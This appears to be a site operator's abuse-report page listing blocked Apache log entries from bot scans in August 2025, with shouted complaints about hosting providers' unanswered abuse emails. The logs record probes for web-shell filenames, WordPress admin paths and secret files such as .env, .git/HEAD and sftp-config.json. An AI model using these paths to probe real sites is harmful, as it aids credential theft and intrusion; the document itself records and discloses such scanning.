35.243.212.8 website*x.com – – [23/Aug/2025:02:54:09 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:09 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:09 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:02:54:09 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
+
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:24 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:25 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:04:07:25 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
+
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:30 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:30 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:30 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:30 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:31 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:31 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:31 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:31 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:31 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
35.243.212.8 website*x.com – – [23/Aug/2025:05:20:31 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
13.79.87.25 website*x.com – – [23/Aug/2025:03:15:19 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:15:19 +0200] „GET /xc.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:15:34 +0200] „GET /gmo.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:15:49 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:16:04 +0200] „GET /ar.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:16:19 +0200] „GET /we.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:16:34 +0200] „GET /abcd.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:16:49 +0200] „GET /modules/mod_simplefileuploadv1.3/elements/filemanager.php HTTP/1.0“ 403 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:16:49 +0200] „GET /pp.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:17:04 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:17:19 +0200] „GET /geck.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:17:34 +0200] „GET /class20.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:17:49 +0200] „GET /ol.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:18:04 +0200] „GET /wp-gr.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:18:19 +0200] „GET /pp.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:18:34 +0200] „GET /error.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:18:49 +0200] „GET /wp-gr.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:19:04 +0200] „GET /build.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:19:19 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:19:34 +0200] „GET /class20.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:19:49 +0200] „GET /size.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:20:04 +0200] „GET /2x.php HTTP/1.0“ 302 – „-“ „-“
13.79.87.25 website*x.com – – [23/Aug/2025:03:20:19 +0200] „GET /fm.php?p= HTTP/1.0“ 302 – „-“ „-“
AS135450 – PT Berkah Solusi Teknologi Informasi – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ptbsti.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.77.107.216 website*x.com – – [23/Aug/2025:04:31:15 +0200] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.216 website*x.com – – [23/Aug/2025:04:31:17 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“

MAIL NR. 5 TODAY!
admin@serveroffer.lt,google-cloud-compliance@google.com, network-abuse@google.com,info@fasthosting.net.za
AS209605 – UAB Host Baltic
admin@serveroffer.lt
141.98.11.23 website*x.com – – [23/Aug/2025:03:35:56 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
141.98.11.23 website*x.com – – [23/Aug/2025:03:35:56 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0“
Google LLC – DAILY HACKER-IDIOTS! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
network-abuse@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:52 +0200] „GET //wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:52 +0200] „GET //xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:52 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:52 +0200] „GET //blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:53 +0200] „GET //media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:54 +0200] „GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:54 +0200] „GET //site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:54 +0200] „GET //cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
34.145.244.219 www.website*x.com – – [23/Aug/2025:07:06:54 +0200] „GET //sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
+
34.126.145.187 website*x.com – – [23/Aug/2025:07:41:27 +0200] „GET /wp-admin/setup-config.ph%70?step=1&language=en_EN HTTP/1.0“ 302 20 „-“ „Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)“
34.126.145.187 website*x.com – – [23/Aug/2025:07:41:27 +0200] „GET /wordpress/wp-admin/setup-config.ph%70?step=1&language=en_EN HTTP/1.0“ 403 – „-“ „Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)“
AS211138 – Private-Hosting di Cipriano oscar – VERY UNSECURE AND IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@fasthosting.net.za – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
41.216.188.205 website*x.com – – [23/Aug/2025:09:57:01 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
41.216.188.205 website*x.com – – [23/Aug/2025:09:57:01 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0“
41.216.188.205 website*x.com – – [23/Aug/2025:09:57:01 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
41.216.188.205 website*x.com – – [23/Aug/2025:09:57:01 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
41.216.188.205 website*x.com – – [23/Aug/2025:09:57:01 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
41.216.188.205 website*x.com – – [23/Aug/2025:09:57:01 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“

MAIL NR. 6 TODAY!
ip-admin@telkom.net.id,hostmaster@telkom.net.id,abuse@convergeict.com,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca
PT Telkom Indonesia APNIC Resources Management – DAILY HACKER-IDIOTS! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ip-admin@telkom.net.id – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
110.138.131.62 website*x.com – – [23/Aug/2025:06:55:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; x86) AppleWebKit/537.36 (KHTML, like Gecko) Safari/10.0.0.0 Safari/537.36“
AS17639 – Converge ICT Solutions Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@convergeict.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
143.44.168.151 website*x.com – – [23/Aug/2025:06:56:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; x86) AppleWebKit/537.36 (KHTML, like Gecko) Edge/93.0.0.0 Safari/537.36“
AS16276 – OVH SAS. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ABUSE PER EMAIL IS STANDARD!
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:08 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:08 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:08 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:08 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:08 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:09 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:09 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:09 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:09 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:09 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:09 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:10 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
51.79.228.118 website*x.com – – [23/Aug/2025:07:44:10 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

MAIL NR. 7 TODAY!
info@fasthosting.net.za,reports@magnates.co.za,bucklog@proton.me,contact@proton.me
AS211138 – Private-Hosting di Cipriano oscar – VERY UNSECURE AND IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@fasthosting.net.za – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
41.216.188.110 website*x.com – – [23/Aug/2025:09:35:53 +0200] „GET /mds.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
AS214209 – Internet Magnate (Pty) Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
reports@magnates.co.za
94.156.152.52 website*x.com – – [23/Aug/2025:13:45:49 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
94.156.152.52 website*x.com – – [23/Aug/2025:13:45:49 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
94.156.152.52 website*x.com – – [23/Aug/2025:13:45:49 +0200] „GET //doiconvs.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
94.156.152.52 website*x.com – – [23/Aug/2025:13:45:49 +0200] „GET //doiconvs.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
AS211590 – Bucklog SARL – HERE WITH 2 IP´S! – VERY IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – IGNORES OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.177.72.113 website*x.com – – [23/Aug/2025:14:05:52 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.113 website*x.com – – [23/Aug/2025:14:05:52 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.113 website*x.com – – [23/Aug/2025:14:05:52 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.113 website*x.com – – [23/Aug/2025:14:05:52 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.113 website*x.com – – [23/Aug/2025:14:05:52 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
+
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:50 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:50 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:50 +0200] „GET /.env.bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
